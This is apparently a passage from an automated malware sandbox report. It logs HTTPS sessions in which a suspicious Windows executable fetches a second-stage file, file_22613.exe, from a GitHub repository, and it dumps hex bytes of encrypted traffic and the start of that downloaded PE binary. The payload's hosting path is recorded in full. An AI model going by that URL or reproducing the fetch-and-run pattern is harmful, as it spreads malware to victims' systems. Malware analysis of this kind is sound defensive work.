d9 28 7e 14 53 4a 4b 34 00 4b 5a 56 06 90 e9 8d 12 57 66 d9 7c e2 ac ed e4 3c 5a cd 72 57 76 a0 d5 97
                                                                              Data Ascii: %8Sq-O@VE=Eh3LzyH?(+1NQW="TMCBO`",M&G"z=AsOUoPv{ve$_a<V&OJGSP$'t*t@=%ie[$sv8Ph\>T/<q(~SJK4KZVWf|<ZrWv
                                                                              2022-06-01 23:53:22 UTC134INData Raw: 17 f4 88 20 4f 22 cb f8 9c b0 8b eb 79 0d 5f c5 fc 31 3a dc b1 cc 37 8c e4 55 13 f2 02 1c ef 08 b1 b0 df 9b f5 f4 42 bb 66 60 5e 14 b3 db cb 7d 3f 2c a3 2e 53 df d1 b0 16 05 60 47 c8 74 a9 f1 be f0 47 a5 c7 9e 21 00 08 9c 55 43 bf 56 02 91 96 66 7e cc 95 69 33 1e e9 11 70 93 07 7b ac a0 ac 5a 78 94 bb 55 0b 45 cf 01 ef 96 9f 78 22 3b b1 c3 a8 a4 73 88 24 5f 33 26 54 96 3a 3f 74 bc 8c 54 74 f3 69 d0 aa 1c 1e 7b 66 e2 00 bd 4f 83 2d 2f 61 55 aa 22 13 94 e6 09 e1 e1 26 8e 01 8d ca 65 11 b9 5b 8c 49 93 1e 47 70 27 a7 51 88 7b 14 b8 bb 1b 33 7f 9c b9 1c 7e 78 2d 94 41 db 29 1c b6 0b 76 74 5e 2b 42 cf c8 94 b1 0c ef d6 e6 5d 26 aa a0 3d 33 9b 5b cd db 1e 42 27 e9 40 c5 cc 3e e9 b2 c6 10 e7 ca b3 25 31 eb 38 0a e1 6f a0 f6 db 8b 95 e5 96 fe 89 cc 6d b1 b1 1d 22
                                                                              Data Ascii: O"y_1:7UBf`^}?,.S`GtG!UCVf~i3p{ZxUEx";s$_3&T:?tTti{fO-/aU"&e[IGp'Q{3~x-A)vt^+B]&=3[B'@>%18om"
                                                                              2022-06-01 23:53:22 UTC138INData Raw: fe fd aa dc da a0 d2 5a ce 79 b7 04 5d 0a e5 8a e1 df 60 1a 37 42 b0 f5 13 ab 12 d2 39 56 d6 f2 9f 0d 36 94 fb 0e e0 fd 99 89 70 52 32 9b 60 16 3a d7 59 4a 4b f2 c0 31 4a c9 20 e4 3f 86 94 56 24 00 2f 75 8e 77 18 0f 4b ea ca 67 62 40 c2 09 ed 7d 6f 87 5b 9e 15 ff 13 ea ff fa ca 1b ab be 9d 2e ea 76 5d 6c 4b a7 f8 04 de ec 25 e7 69 39 0f e8 af 58 b5 3c 8d f6 e8 d3 3e de c2 09 64 52 95 94 ac 5e fb 60 5e 86 2a 29 d3 b8 18 ae 28 7b 8c 70 15 df ac 05 47 af d1 24 3f dd 1a a3 8d f3 48 93 9b 85 39 b5 24 04 08 31 aa 0d 76 2d d8 78 7d 1b 71 57 85 84 cb 89 dd 88 2b 2d ac b2 4f 0c 5d a3 27 dd b2 2d 90 ac 65 4c 53 fe 2a 4d 63 cc 76 00 2a c2 5a 52 1b ef 2a b7 cc 4d b0 b3 4b 8f 40 96 0d 25 18 f8 80 bf 0a 8b ef 70 15 7e 88 6f 3f 82 ee 61 f8 f6 39 74 b2 02 ff 9d e6 72 fa
                                                                              Data Ascii: Zy]`7B9V6pR2`:YJK1J ?V$/uwKgb@}o[.v]lK%i9X<>dR^`^*)({pG$?H9$1v-x}qW+-O]'-eLS*Mcv*ZR*MK@%p~o?a9tr
                                                                              2022-06-01 23:53:22 UTC142INData Raw: 4b bf e0 76 b3 29 c8 f7 d9 a2 83 c2 15 cb a2 76 62 a0 1a 75 6f fd b1 5d 32 dd 8e b1 43 12 af 91 ed 1e 10 e2 9b 52 f6 f5 04 1a d3 f9 46 88 b9 e9 21 59 1a f0 5a 30 2a 77 7d b0 1b 80 d2 73 0b 17 a4 e5 14 d9 e6 99 9f 58 cf ee 1d 25 52 f6 df ac f9 cf fa 3b f6 29 0a da d1 fd 1a 06 81 18 be 6d 00 4c 53 88 e8 48 a7 0b c2 5b 5e 3e 9e 92 aa 99 80 46 42 55 32 ae ee 18 bd 52 13 ab 32 fd f9 22 ed 8a 0a 06 aa 95 d7 03 b7 04 d3 6d 5e 91 97 16 b9 c5 f4 76 bc 77 a4 cb 1d 72 66 7b f1 76 07 8f cc 18 2d ba c1 80 5b 51 00 d7 42 ec 3b d9 0e 32 67 a4 e9 76 b4 1e ee 5e 2f e0 bd 6a 30 53 4b 56 6e 8f 89 26 7b f9 01 f7 56 0b 4c d9 82 b0 25 3d 66 59 2b 9d ca 29 33 70 d3 d1 ab cf a1 4a 0f 09 2d 22 47 40 31 aa 79 39 e4 91 ef 26 ba a6 5a 22 31 e2 28 fc de f8 da 6e 96 88 d1 d8 41 a0 28
                                                                              Data Ascii: Kv)vbuo]2CRF!YZ0*w}sX%R;)mLSH[^>FBU2R2"m^vwrf{v-[QB;2gv^/j0SKVn&{VL%=fY+)3pJ-"G@1y9&Z"1(nA(
                                                                              2022-06-01 23:53:22 UTC146INData Raw: 2f 55 a2 37 f7 09 43 d7 7c 6e 5f 2f 2e 45 4a 17 03 6f 7f db 4b 9b a1 50 1c 77 d1 8c b7 ca 96 57 f7 2a 81 af 8c 15 56 5c 3e c7 9a 11 93 55 5d 7c 22 9a 7f 38 66 c1 bb 40 c7 86 a6 ad 97 8e 2a a0 2d 86 04 97 f7 d1 11 bc 0b 8d d4 5d 16 45 01 89 3f a9 a0 6c 74 bc 9a 9d d1 d1 30 c1 dc 43 71 bf 90 bf 5d 5b c2 36 31 b3 a6 63 74 92 8c f3 5f 0c a4 8c 23 24 41 db 27 01 5d 2c 7f 36 35 4f ed 04 2b 66 12 d5 53 ab 39 0a 5e d9 9d c4 09 68 c0 fd 2e 7e ac f0 5e 4d a2 1c b3 6f 8b eb 5b 59 f3 08 03 2c 98 4e 95 57 37 91 c8 79 56 2b 34 b0 6d 18 89 90 d6 23 e8 25 0e c1 2c 04 af 61 ec a2 cb 45 4f 01 90 83 ac 1d d2 aa 45 a1 db 3a 81 28 d6 02 c6 b3 e4 b7 b4 cc 81 e8 00 9d 4d 24 41 98 5c 83 2a e2 de b7 e5 d4 2a 1c 81 ee a1 fc 39 40 4f ca 09 37 c8 dd 00 13 c7 0e 1f 0e 17 ec 84 cc 9c
                                                                              Data Ascii: /U7C|n_/.EJoKPwW*V\>U]|"8f@*-]E?lt0Cq][61ct_#$A'],65O+fS9^h.~^Mo[Y,NW7yV+4m#%,aEOE:(M$A\**9@O7
                                                                              2022-06-01 23:53:22 UTC150INData Raw: 01 a6 15 8f b2 62 e6 8e 8d b1 49 d2 62 94 5c f8 3e 92 24 6d 6a d9 99 90 c5 24 7e 46 a3 d5 0d cd 4e cc bd af 64 cf 5e dc 06 1c 15 c8 99 77 69 a6 35 86 46 7e 98 a8 ab a4 28 43 32 6c 1b d2 96 d7 68 17 aa 6c 0e a3 a8 0f d9 f8 96 c4 de 29 f3 07 5d b7 82 b3 43 1a e4 da a3 93 e9 92 de cf 4d 80 ef 42 53 93 a8 37 c9 2d 10 36 f4 3d 12 53 e8 0f e4 f1 c9 e0 b6 87 a5 36 c9 94 e8 45 7b 10 d7 e2 aa 92 68 80 45 33 0d 89 42 6c 57 90 17 68 93 38 2c 84 1a 36 e6 21 c6 6a d7 7f 73 0e 25 75 1b f4 31 a8 f9 42 1c 2c 4e 65 8c 14 f1 e4 ed ac 55 48 2d 59 6b 00 0f c0 70 cc 13 4d 26 04 e6 d7 33 61 28 cd 30 06 72 78 55 5d d4 d5 00 17 31 30 44 b6 ea 42 c6 3b f9 e3 f7 f3 28 e7 95 e2 fd 9e 35 5f 60 c2 f8 11 b7 e8 08 b1 dd 76 d4 b1 a0 40 7c a3 33 49 c6 03 dc 76 28 ee 4e c1 05 30 b5 48 b9
                                                                              Data Ascii: bIb\>$mj$~FNd^wi5F~(C2lhl)]CMBS7-6=S6E{hE3BlWh8,6!js%u1B,NeUH-YkpM&3a(0rxU]10DB;(5_`v@|3Iv(N0H
                                                                              2022-06-01 23:53:22 UTC154INData Raw: a5 7f 58 9f da ab f1 66 a0 25 5e 28 dc 0f 41 90 d2 14 df fe 21 4a b1 0a ab f7 20 9e b1 7c ee 65 cd 9e da d8 ae 1a 9e fe c5 6b c6 65 c9 59 69 0f ba 0d 75 a2 b3 bb 57 84 45 d7 75 b9 31 cc 3c 0a 96 55 66 da 3f ec 65 68 fd 49 a2 27 10 5a de 08 ee 32 49 f5 9f c2 c6 e5 59 7f a5 2b 85 f5 74 3b 88 57 9d 06 c9 61 33 3d a8 d8 21 04 9e 70 5b e9 72 b2 c3 ab ce c4 c2 a0 6d 57 59 1c 88 0f 01 d4 b1 af a3 d8 b1 65 09 9b 89 dc 4c cb 19 ac f9 a4 c2 8e 87 93 e6 f4 72 b8 63 a8 b2 c4 51 95 a5 42 ec 81 16 19 32 4c c7 94 e6 e6 a5 d3 5a 9e c6 e2 dd 81 ee 63 de 1a 6f e6 e2 84 20 17 7e 05 ed a3 8b d2 0e 6e fa 37 49 53 44 bf 01 fc 69 06 67 03 b6 b9 aa 39 fd 4c 9c 16 d4 50 2e 05 a6 5f 7f 1e cd 95 9a 12 c9 fe a5 27 0a d7 70 3d 78 1d e7 df 14 a9 98 31 69 5a 77 2e db 29 41 be bc 04 23
                                                                              Data Ascii: Xf%^(A!J |ekeYiuWEu1<Uf?ehI'Z2IY+t;Wa3=!p[rmWYeLrcQB2LZco ~n7ISDig9LP._'p=x1iZw.)A#
                                                                              2022-06-01 23:53:22 UTC158INData Raw: 7f dc 9f 68 7e 3b 35 46 15 58 28 70 00 49 65 c2 5b 8f d8 ea ba 24 c6 df a3 16 c4 4a 44 00 d0 78 96 6a b5 9f e8 72 9f 3c 5b 78 0b e0 bb 70 3d ab 69 09 9b af 6f 6f 4f 09 70 75 28 6f c7 8a 2c df b5 f8 0c 56 39 c4 cf 1b 32 03 fd 0b 2d 44 22 2b 10 b3 c3 4a d8 60 f4 b3 f0 31 54 79 f7 46 7a f0 26 fa de 61 e8 53 36 69 3f 81 c2 36 01 f9 9a 79 2e 39 01 23 2a fa 9d e5 35 65 fc 35 07 cc 6b 77 97 f2 a9 1a 5a d9 a7 40 76 1e e3 9d 23 bd e1 b4 d1 ad 9a dc a8 01 8e 03 46 42 b5 e9 6d 75 97 1b f9 5c af fe 02 f1 51 6a 6f c5 57 a0 9d 77 96 87 0c b2 97 d2 f0 3d 80 9f 05 95 25 83 4a d8 cd 11 4a 93 e7 57 af 00 c8 f7 eb 06 4a 38 87 36 9a 7f 37 6b 7e ea 1d f7 ba 80 37 79 58 05 0f 43 95 c0 df 5f 28 43 8b 4b 99 80 19 7f 78 1f 65 85 1e dc 89 95 01 14 04 ea d1 b0 11 39 c5 44 46 20 53
                                                                              Data Ascii: h~;5FX(pIe[$JDxjr<[xp=iooOpu(o,V92-D"+J`1TyFz&aS6i?6y.9#*5e5kwZ@v#FBmu\QjoWw=%JJWJ867k~7yXC_(CKxe9DF S
                                                                              2022-06-01 23:53:22 UTC162INData Raw: 5b 7e 3c 31 e3 a7 46 8e c2 72 39 d0 07 5a 42 5f 40 93 f9 01 3b 3b fb b3 85 e7 50 59 56 45 58 88 71 6e 83 ae 2f b6 6a 75 20 be 76 71 4c 5c 4d 98 0f 70 72 95 2f a9 b4 4f 67 00 49 3c 92 e6 af 92 84 70 9b 2e 19 41 7e 06 ff d9 a7 e0 ed 81 c6 0b 2c d8 c6 d7 cc e5 e8 a1 2a 0b da 30 80 7b f1 0b c1 a2 34 06 92 bd a1 bb 30 e8 8b 9d c7 10 dd 2c ae 1c 6c 15 86 8b b8 df 2e 9a 5f 6b a6 2f 21 e7 ba 8c 01 c7 12 cf 44 f1 df da b1 62 72 e7 80 e2 0d 1e 40 5a 6b da 33 b1 aa 13 4b 51 6f a0 86 13 24 ba 62 d0 b1 75 29 a2 e9 5d f6 50 a2 75 a7 b1 8c 2d d1 34 01 dd 96 0f dd 7f e2 5b bc 66 54 a2 33 14 78 fa 37 ad ba 6b b4 a8 41 6b 9f aa 8d a4 ff 0f f7 e7 6e e3 86 f3 41 0e 39 17 de 54 1f 1e b9 ab 8a 76 3a e3 4b db bb 3e 24 d2 ad 93 12 f6 7f 21 98 be 5a 64 78 17 fa 37 95 1f 37 7c a4
                                                                              Data Ascii: [~<1Fr9ZB_@;;PYVEXqn/ju vqL\Mpr/OgI<p.A~,*0{40,l._k/!Dbr@Zk3KQo$bu)]Pu-4[fT3x7kAknA9Tv:K>$!Zdx77|
                                                                              2022-06-01 23:53:22 UTC166INData Raw: f0 25 7e 51 38 1d 05 0c 23 b6 e1 dd 5a fd bf d6 b5 f7 2a 32 06 33 86 66 4d 54 ee 51 0f 5a 43 c8 1f 2a 43 7c 5e b8 05 d4 e5 a1 b7 14 f7 22 36 6b 7b 98 f1 cd 38 fd 7e 60 50 70 4d 52 28 64 1d 42 7e d5 3f 86 86 d8 dc e3 3d 4e 43 ab 3b 84 1e 17 95 94 ee 9b e5 b3 9b 0f 38 ac 37 c8 5b b4 e4 35 fd 38 25 0e 97 d2 f0 97 1e 42 73 b1 53 ad 1b b7 e1 2b 9e f0 0b 28 bc 8c 06 fc df 18 61 4c 6b 2d 90 49 d5 d4 c1 09 51 cc 81 30 92 56 b3 6b fb b8 38 58 5f 5e ac ed 72 75 ea 32 c5 fa 61 4b 43 90 11 f4 91 c2 e0 4c ac b6 ab 49 b4 96 28 75 c6 7d b4 80 ae 9d 7e d5 5d 09 64 3a ad 86 25 b1 78 db bf 21 37 dc 9a 4b 1b fd 26 e8 96 b2 ba 1f 8c d0 07 74 2a 5c ac 5e 21 a4 78 c8 18 f3 e2 ee ff c5 22 b9 f6 31 51 39 f1 40 3f b6 3b 70 6d e8 a4 aa fd 02 b4 9b ef 22 d3 83 a8 a3 24 92 12 ff 70
                                                                              Data Ascii: %~Q8#Z*23fMTQZC*C|^"6k{8~`PpMR(dB~?=NC;87[58%BsS+(aLk-IQ0Vk8X_^ru2aKCLI(u}~]d:%x!7K&t*\^!x"1Q9@?;pm"$p
                                                                              2022-06-01 23:53:22 UTC170INData Raw: 4d 0c 70 b4 31 fe e5 2a bd 81 5a fe 60 c1 74 d1 cf 39 30 af 43 48 f8 48 12 fa cb 1a db 7c 54 ba 40 d1 b0 77 f7 7f c5 b8 0a 5b 4b aa 98 6f c7 57 c3 82 61 9c 57 cc 08 16 67 4f e3 62 f3 62 0b b7 8c 60 1a ed c0 cd bc f3 86 54 65 95 9e 4d 9e 49 cc ea 65 a0 f4 d9 ed 23 2f 05 4b 55 bb f6 92 c6 d0 0c c4 be 77 12 ea c0 b0 df 52 62 4b f2 3e 34 2f a2 f7 ab 21 be 62 34 23 41 b1 87 3b 63 01 1b 37 20 59 00 a8 ff e5 bc 39 f4 e3 62 81 51 08 f2 90 1f f2 71 c1 2f c3 56 56 6b d5 ef f9 98 17 02 ed 1a 7e cf e3 df 8b 47 15 57 83 a5 ff 24 0e 3b 3a 10 38 ec 22 a1 50 df 5c 6f 63 ab 30 5e c0 59 54 ed a7 92 b8 8b b7 4c bc ea ee 93 1e a5 e1 06 13 71 78 24 a0 8c 6e 7e 19 04 67 87 ca 6f d3 11 36 24 7b 5f 67 ab 45 83 86 ec 83 50 55 ae 7b f8 7d 16 c8 51 dd 80 5c 54 e4 4f 04 2e 28 51 e0
                                                                              Data Ascii: Mp1*Z`t90CHH|T@w[KoWaWgObb`TeMIe#/KUwRbK>4/!b4#A;c7 Y9bQq/VVk~GW$;:8"P\oc0^YTLqx$n~go6${_gEPU{}Q\TO.(Q
                                                                              2022-06-01 23:53:22 UTC174INData Raw: d4 c9 14 55 f3 0a 03 5c ae 0c 91 d5 0a ca 0f 2e 41 77 ed e3 a6 53 81 f3 47 96 ec ab 98 6f 1b 35 a4 12 9f d7 a1 cb fc 94 58 0f a4 8b b1 05 4c 45 09 56 f4 4f 7d 9c 76 24 44 d9 23 66 c7 32 72 4a 10 62 30 43 b1 9b 52 a1 fe 97 ca 44 03 0d bb 8e 01 a1 dc 52 4d 74 e1 f0 b3 f7 40 0e 95 77 da 69 b4 72 3f 56 b7 92 bf 4c a8 5b ed 98 5c 1a 6f 1e 3b 81 fa 81 97 53 c6 8a 23 be 89 8c 1b f4 ae 8f 49 26 34 6a 1a 11 28 f0 40 32 4c ce 3a cf ec e6 a8 70 ed 8b 19 36 24 57 d3 dd 44 22 aa 97 5e a3 7a 28 eb 06 f9 f9 9e 7f 69 9f 36 5d 51 79 1a 6d d5 6b d7 58 1e 99 ec 9a e2 98 a7 4f cd ea 4c ef ba 93 f4 94 2b 25 bb a3 93 29 9a a7 0b bb 2c 56 97 9a af 42 79 3d f3 d8 d9 6d 9a 6c 23 89 d5 7f 2b 22 68 eb 8e 1f 3b 46 9f 90 af f3 42 2a c7 13 50 cb 09 fd 19 76 1e d5 54 3a 74 15 9d 07 96
                                                                              Data Ascii: U\.AwSGo5XLEVO}v$D#f2rJb0CRDRMt@wir?VL[\o;S#I&4j(@2L:p6$WD"^z(i6]QymkXOL+%),VBy=ml#+"h;FB*PvT:t
                                                                              2022-06-01 23:53:22 UTC178INData Raw: 15 cc 89 cc a9 9a de 54 8f 01 0c e6 a0 70 7d 5b 56 ba c0 45 d8 6f e4 56 02 ed 50 4c 86 3d 09 d6 c0 46 5c 22 f8 ce ce 12 e5 1d 4f f0 7e 83 71 cb a3 e3 c2 ec e2 ab 84 e5 61 7b c3 ee a4 80 aa 77 14 30 bf 7a 44 de 9d 18 87 c5 d0 fd de 1d 04 e6 9c 92 d2 2e 3d 32 ac 72 cd 3b 66 0c 2d fe 20 e5 2c 1e bf 4b 78 1a ff db 25 ec c5 8a af 4c f2 a8 84 4c c2 b5 f4 52 89 6c 3c da 54 2f 0d b6 44 a1 ee f7 b4 66 86 a2 7e 70 1a eb 33 c3 64 26 5c 70 9a 10 fe bf d0 dd 83 fc 3c a0 79 47 63 8f 9c 25 58 4e 9d 96 91 44 fc 09 4a 0a 87 4d 60 03 03 5e 68 4f 53 43 be 7a a3 06 f6 f5 d7 34 cc d4 c3 6d c4 e6 0e a0 0b d7 22 bb bc e0 23 be fa 27 94 a6 f5 21 56 ca 0a e4 15 f7 89 ee 0c 40 c4 98 9f 06 d8 a4 ba 64 72 47 ed 2d f4 c0 4b a9 26 71 61 91 95 4b 09 79 5e 19 8d ed e4 dd c4 f7 31 43 9b
                                                                              Data Ascii: Tp}[VEoVPL=F\"O~qa{w0zD.=2r;f- ,Kx%LLRl<T/Df~p3d&\p<yGc%XNDJM`^hOSCz4m"#'!V@drG-K&qaKy^1C
                                                                              2022-06-01 23:53:22 UTC183INData Raw: 5d 52 92 c7 04 ea ef b2 cd a5 48 41 e8 89 31 60 be 42 57 ba 0b 7b 6d 32 3e 6b a2 4c 0d ef 86 c2 b3 79 45 c2 e1 56 55 2c 26 1c f3 c1 f3 d4 cf 9a e1 60 f3 97 bd e7 a5 0f 71 5e f2 a5 6c f1 88 e1 bd 63 e7 a9 cd f0 59 61 29 bb 0b 0b 19 72 7f 09 5b 08 3e 11 7c 8e 8a 13 16 c2 59 40 6a 50 22 98 4f 6b 5c ff 61 49 0a d6 71 ff 18 ba 57 f8 ec c9 2c 56 63 cc be 4d b4 30 43 93 15 e7 97 ff db b0 ec 69 56 b9 fd 11 50 2f 9d 79 e1 18 be 34 44 c4 1c d8 62 22 28 92 c9 eb a8 81 3d 3e 28 f3 63 4a 86 13 56 26 7a 52 32 1b ed 5a ec 2e cc 07 d1 09 6c 42 32 dc 75 0d 78 07 82 0e ca 48 58 58 b7 62 af 4d 1a 7d 1c 9e d1 09 74 75 1c e8 99 45 a6 6a 83 79 90 25 da 33 81 c8 63 e3 55 23 f5 6e 6a 9d 28 a7 92 11 c4 50 7e 6c ba fc 9a 70 a8 a7 15 08 68 56 84 11 69 37 f2 35 ff 11 9f f9 d9 99 cc
                                                                              Data Ascii: ]RHA1`BW{m2>kLyEVU,&`q^lcYa)r[>|Y@jP"Ok\aIqW,VcM0CiVP/y4Db"(=>(cJV&zR2Z.lB2uxHXXbM}tuEjy%3cU#nj(P~lphVi75
                                                                              2022-06-01 23:53:22 UTC187INData Raw: a6 0b 45 2a f7 e8 40 39 8d ba 22 b2 38 ef 32 57 ed 9e 41 ef 20 2a 3d f9 8e b9 6a 3c 5f 9d 16 06 07 ab 25 f7 1e 66 77 7b 65 42 cf 5b 5a 48 16 85 b6 6f 8d a3 16 06 17 88 b8 0f f4 8d 97 ff ff f0 c0 7d 9d 82 c8 54 dd 4a 9b 60 64 51 5d 1c d1 5a ef ce 64 34 46 e0 a3 85 de 5c a8 12 f2 49 c7 73 4e 30 da 38 1f f8 f1 b7 5e 07 c9 52 eb 96 f1 4c 7d d7 31 b8 7c 2c bb 49 bb 46 c5 34 c1 b6 62 3a c5 96 0e 45 2f 7f e5 b5 e7 db 27 02 a3 15 7a cc ab c8 e3 31 c9 06 d4 29 f7 c2 41 4b dd 83 23 9f 0c d1 be 9c 53 30 b4 f5 f3 5c 96 b7 b8 9c 8a fa 7e 00 d7 84 9d 4c 11 a2 dd 3e 80 27 ad c8 23 f0 31 92 c9 75 67 f4 4f b9 f0 33 6f ef c1 5b 2d 3d 36 f1 2a 98 40 5d 89 f6 2a d5 16 e5 8f b7 ad a8 7b c8 4d 87 a8 94 77 c4 ef f6 d9 48 c1 9f 3e cc 07 bd c5 aa ac 4f 00 5c 7e 9d 91 45 2f b3 c5
                                                                              Data Ascii: E*@9"82WA *=j<_%fw{eB[ZHo}TJ`dQ]Zd4F\IsN08^RL}1|,IF4b:E/'z1)AK#S0\~L>'#1ugO3o[-=6*@]*{MwH>O\~E/


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              1192.168.2.449766140.82.121.3443C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              2022-06-01 23:53:41 UTC190OUTGET /neiqops/ajajaj/raw/main/file_22613.exe HTTP/1.1
                                                                              Host: github.com
                                                                              Connection: Keep-Alive
                                                                              2022-06-01 23:53:41 UTC190INHTTP/1.1 302 Found
                                                                              Server: GitHub.com
                                                                              Date: Wed, 01 Jun 2022 23:52:26 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                              permissions-policy: interest-cohort=()
                                                                              Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                              Location: https://raw.githubusercontent.com/neiqops/ajajaj/main/file_22613.exe
                                                                              Cache-Control: no-cache
                                                                              Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                              X-Frame-Options: deny
                                                                              X-Content-Type-Options: nosniff
                                                                              X-XSS-Protection: 0
                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                              Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                              2022-06-01 23:53:41 UTC191INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                              Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              2192.168.2.449767185.199.108.133443C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              2022-06-01 23:53:42 UTC193OUTGET /neiqops/ajajaj/main/file_22613.exe HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Host: raw.githubusercontent.com
                                                                              2022-06-01 23:53:42 UTC193INHTTP/1.1 200 OK
                                                                              Connection: close
                                                                              Content-Length: 1472680
                                                                              Cache-Control: max-age=300
                                                                              Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                              Content-Type: application/octet-stream
                                                                              ETag: "6b6903fce2d862bd129ed03ef0037429e4f49bb137a65b7d3e4355633db14b85"
                                                                              Strict-Transport-Security: max-age=31536000
                                                                              X-Content-Type-Options: nosniff
                                                                              X-Frame-Options: deny
                                                                              X-XSS-Protection: 1; mode=block
                                                                              X-GitHub-Request-Id: 6840:AD8C:35A0DF:3BC5C0:6297FC06
                                                                              Accept-Ranges: bytes
                                                                              Date: Wed, 01 Jun 2022 23:53:42 GMT
                                                                              Via: 1.1 varnish
                                                                              X-Served-By: cache-mxp6947-MXP
                                                                              X-Cache: MISS
                                                                              X-Cache-Hits: 0
                                                                              X-Timer: S1654127622.232593,VS0,VE117
                                                                              Vary: Authorization,Accept-Encoding,Origin
                                                                              Access-Control-Allow-Origin: *
                                                                              X-Fastly-Request-ID: fbf1f93d744eb5a7acb8a9fa871d86edaeea4b47
                                                                              Expires: Wed, 01 Jun 2022 23:58:42 GMT
                                                                              Source-Age: 0
                                                                              2022-06-01 23:53:42 UTC194INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 fc 9d 97 4b b8 fc f9 18 b8 fc f9 18 b8 fc f9 18 a6 ae 6c 18 ac fc f9 18 a6 ae 7a 18 c3 fc f9 18 a6 ae 7d 18 97 fc f9 18 9f 3a 82 18 bf fc f9 18 b8 fc f8 18 df fc f9 18 a6 ae 73 18 ba fc f9 18 a6 ae 6d 18 b9 fc f9 18 b8 fc 6e 18 bd fc f9 18 a6 ae 68 18 b9 fc f9 18 52 69 63 68 b8 fc f9 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04
                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$Klz}:smnhRichPEL
                                                                              2022-06-01 23:53:42 UTC195INData Raw: 14 00 88 bb 14 00 96 bb 14 00 00 00 00 00 3e b6 14 00 58 b6 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 58 41 00 28 8e 41 00 7a b3 41 00 ec cd 41 00 40 b4 41 00 00 00 00 00 00 00 00 00 f4 05 42 00 71 59 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 52 80 92 62 00 00 00 00 02 00 00 00 3b 00 00 00 08 37 00 00 08 2b 00 00 62 61 64 20 61 6c 6c 6f 63 61 74 69 6f 6e 00 00 d8 38 40 00 40 3a 40 00 1f 19 41 00 8c 38 40 00 c0 3c 40 00 a0 3c 40 00 3c 38 40 00 40 3d 40 00 a0 3c 40 00 44 37 40 00 51 16 41 00 a0 3c 40 00 73 74 72 69 6e 67 20 74 6f 6f 20 6c 6f 6e 67 00 69 6e 76 61 6c 69 64 20 73 74 72 69 6e 67 20 70 6f 73 69 74 69 6f 6e 00 94 37 40 00 2c 19 41 00 1f 19 41 00 55 6e 6b 6e 6f 77 6e 20 65 78 63 65 70 74 69 6f 6e
                                                                              Data Ascii: >XXA(AzAA@ABqYARb;7+bad allocation8@@:@A8@<@<@<8@@=@<@D7@QA<@string too longinvalid string position7@,AAUnknown exception
                                                                              2022-06-01 23:53:42 UTC196INData Raw: 77 69 6f 20 69 6e 69 74 69 61 6c 69 7a 61 74 69 6f 6e 0d 0a 00 00 00 00 52 36 30 32 36 0d 0a 2d 20 6e 6f 74 20 65 6e 6f 75 67 68 20 73 70 61 63 65 20 66 6f 72 20 73 74 64 69 6f 20 69 6e 69 74 69 61 6c 69 7a 61 74 69 6f 6e 0d 0a 00 00 00 00 52 36 30 32 35 0d 0a 2d 20 70 75 72 65 20 76 69 72 74 75 61 6c 20 66 75 6e 63 74 69 6f 6e 20 63 61 6c 6c 0d 0a 00 00 00 52 36 30 32 34 0d 0a 2d 20 6e 6f 74 20 65 6e 6f 75 67 68 20 73 70 61 63 65 20 66 6f 72 20 5f 6f 6e 65 78 69 74 2f 61 74 65 78 69 74 20 74 61 62 6c 65 0d 0a 00 00 00 00 52 36 30 31 39 0d 0a 2d 20 75 6e 61 62 6c 65 20 74 6f 20 6f 70 65 6e 20 63 6f 6e 73 6f 6c 65 20 64 65 76 69 63 65 0d 0a 00 00 00 00 52 36 30 31 38 0d 0a 2d 20 75 6e 65 78 70 65 63 74 65 64 20 68 65 61 